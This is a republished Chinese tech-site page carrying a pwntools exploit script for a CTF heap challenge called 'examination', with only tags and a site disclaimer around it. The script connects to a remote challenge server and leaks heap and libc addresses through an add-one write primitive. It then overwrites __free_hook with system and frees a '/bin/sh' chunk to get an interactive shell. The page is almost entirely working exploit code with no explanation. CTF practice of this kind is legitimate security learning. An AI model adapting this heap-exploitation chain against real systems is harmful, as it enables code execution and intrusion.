标签：0x80 choice CTF base role 2022 sendlineafter examination def

exp

from pwn import*
context.log_level = 'debug'
context.arch = 'amd64'

#s = process('./examination')
s = remote('124.70.130.92',60001)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def init_role(role):
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))

def add_s(num):
    s.sendlineafter(b'choice>> ', b'1')
    s.sendlineafter(b'enter the number of questions: ', str(num))

def give_score():
    s.sendlineafter(b'choice>> ', b'2')

def write_view(c,index,size,comment):
    s.sendlineafter(b'choice>> ', b'3')
    s.sendlineafter(b'which one? > ', str(index))
    if(c):
        s.sendafter(b'enter your comment:\n', comment)
    else:
        s.sendlineafter(b'please input the size of comment: ', str(size))
        s.sendafter(b'enter your comment:\n', comment)

def call_parent(index):
    s.sendlineafter(b'choice>> ', b'4')
    s.sendlineafter(b'which student id to choose?', str(index))

def change_role(role):
    s.sendlineafter(b'choice>> ', b'5')
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))

def t_exit():
    s.sendlineafter(b'choice>> ', b'6')

def test():
    s.sendlineafter(b'choice>> ', b'1')

def check(ptr):
    s.sendlineafter(b'choice>> ', b'2')
    s.sendafter(b'add 1 to wherever you want! addr: ', ptr)

def pray():
    s.sendlineafter(b'choice>> ', b'3')

def mode(p,score,mode):
    s.sendlineafter(b'choice>> ', b'4')
    if(p):
        s.sendlineafter(b'enter your pray score: 0 to 100\n', str(score))
    else:
        s.sendafter(b'enter your mode!\n', mode)

def change_id(index):
    s.sendlineafter(b'choice>> ', b'6')
    s.sendlineafter(b'input your id: ', str(index))

#0x5080

init_role(0)

add_s(1) # 0
add_s(1) # 1
add_s(1) # 2
write_view(0,0,0x80,b'a'*0x80)
write_view(0,1,0x80,b'a'*0x80)
write_view(0,2,0x80,b'a'*0x80)

change_role(1)
pray()
change_id(2)
pray()

change_role(0)
give_score()

change_role(1)
change_id(2)

s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x340
success('heap_base=> '+hex(heap_base))

ptr = heap_base + 0x1f
success('ptr1=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))

change_role(0)
add_s(1) # 3
write_view(0,3,0x80,b'a'*0x80)
call_parent(1)

change_role(1)
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x2a0
success('heap_base=> '+hex(heap_base))

ptr = heap_base + 0x2e2
success('ptr2=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))

libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ecbe0
success('libc_base=>' +hex(libc_base))

system = libc_base + libc.sym['system']

change_role(0)

payload = b'/bin/sh\x00' + b'a'*0x80 + p64(0x91) + b'b'*0x80 + p64(0x90)*2 + b'c'*0x88
payload+= p64(0x31) + p64(heap_base + 0x570) + b'\x00'*0x20
payload+= p64(0x21) + p64(0x1) + p64(libc_base + libc.sym['__free_hook'])

write_view(1,0,0x80,payload)

write_view(1,3,0x80,p64(system))

call_parent(0)

#gdb.attach(s)
s.interactive()

标签：0x80,choice,CTF,base,role,2022,sendlineafter,examination,def
来源： https://www.cnblogs.com/pwnfeifei/p/16250158.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。